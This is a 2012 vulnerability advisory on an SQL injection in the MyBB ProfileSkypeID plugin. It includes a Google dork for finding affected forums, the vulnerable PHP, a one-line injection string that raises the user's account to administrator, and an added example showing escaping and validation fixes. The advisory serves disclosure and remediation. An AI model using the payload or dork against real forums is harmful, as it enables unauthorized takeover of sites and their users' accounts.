MyBB plugin Profile Skype ID privilege escalation.

2013.01.02
Credit: Zixem
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title:
# Google Dork: intext:"Skype ID Skype ID:" inurl:member
# Date: 12.20.2012
# Exploit Author: Zixem
# Software Link: http://mods.mybb.com/view/user-profile-skype-id
# Version: 1.0
# Tested on: Linux.
----------------------------------------------
The ProfileSkypeID plugin suffers from SQL injection in an UPDATE query.
The vulnerability exists within profileskype.php, which is located in the /inc/plugins/ folder.

<?php
$plugins->add_hook("datahandler_user_update", "profileskype_update"); /*Line 15*/

function profileskype_update($skype) /*Line 167*/
{
    global $mybb;
    if (isset($mybb->input['skype']))
    {
        // The raw request value is copied into the UPDATE data without escaping.
        $skype->user_update_data['skype'] = $mybb->input['skype'];
    }
}
?>

How to exploit:
(1) Go to usercp.php?action=profile
(2) Insert the following string in your Skype ID: zix', usergroup='4
(3) Have some fun, you're an admin.

Proof of concept:
(1) Writing the injection: http://i.imgur.com/hg3FW.png
(2) Updating the profile and waiting a few seconds: http://i.imgur.com/fkwdi.png
(3) You're an admin: http://i.imgur.com/JIkRX.png
----------------------------------------------
[*] Follow for more: http://twitter.com/z1xem
[*] http://zixem.altervista.org/
[*] http://zentrixplus.net/
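The missing escaping in profileskype_update(), modeled as a stand-alone PHP script with the unescaped value beside two corrected forms (an added example, not code from the plugin or from MyBB). build_update() and escape_string() are simplified stand-ins assumed here for the database layer, and the Skype-name pattern in clean_skype() is an assumed allow-list; in the plugin itself the equivalent fix is to pass $mybb->input['skype'] through MyBB's $db->escape_string() before storing it in user_update_data.

```php
<?php
// Added example: a stand-alone model of the flaw and its fix.
// None of these functions are MyBB's or the plugin's own code.

// Assumed stand-in for the DB layer's UPDATE builder: every value is wrapped
// in single quotes and is expected to arrive already escaped.
function build_update(string $table, array $data, string $where): string
{
    $sets = [];
    foreach ($data as $column => $value) {
        $sets[] = "`{$column}`='{$value}'";
    }
    return "UPDATE {$table} SET " . implode(', ', $sets) . " WHERE {$where}";
}

// Assumed stand-in for $db->escape_string(): backslash-escapes quotes.
function escape_string(string $value): string
{
    return addslashes($value);
}

// Hardened handling: reject anything that is not a plausible Skype name,
// then escape anyway so the value is safe even if the pattern is loosened.
function clean_skype(string $input): ?string
{
    // Assumed format: starts with a letter, 6 to 32 characters in total.
    if (!preg_match('/\A[A-Za-z][A-Za-z0-9._,\-]{5,31}\z/', $input)) {
        return null; // caller should keep the old value and show an error
    }
    return escape_string($input);
}

$input = "zix', usergroup='4"; // the string from the advisory above

// 1. Plugin behaviour: the quote in the input closes the skype value, so the
//    rest of the input is parsed as a second column assignment.
echo build_update('mybb_users', ['skype' => $input], "uid='2'"), PHP_EOL;

// 2. Escaped: the whole input stays inside the skype string literal.
echo build_update('mybb_users', ['skype' => escape_string($input)], "uid='2'"), PHP_EOL;

// 3. Validated: the advisory string is rejected, a constructed name passes.
var_dump(clean_skype($input));
var_dump(clean_skype('sample.user01'));
```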

References:

http://mods.mybb.com/view/user-profile-skype-id
https://cxsecurity.com/issue/WLB-2012120133

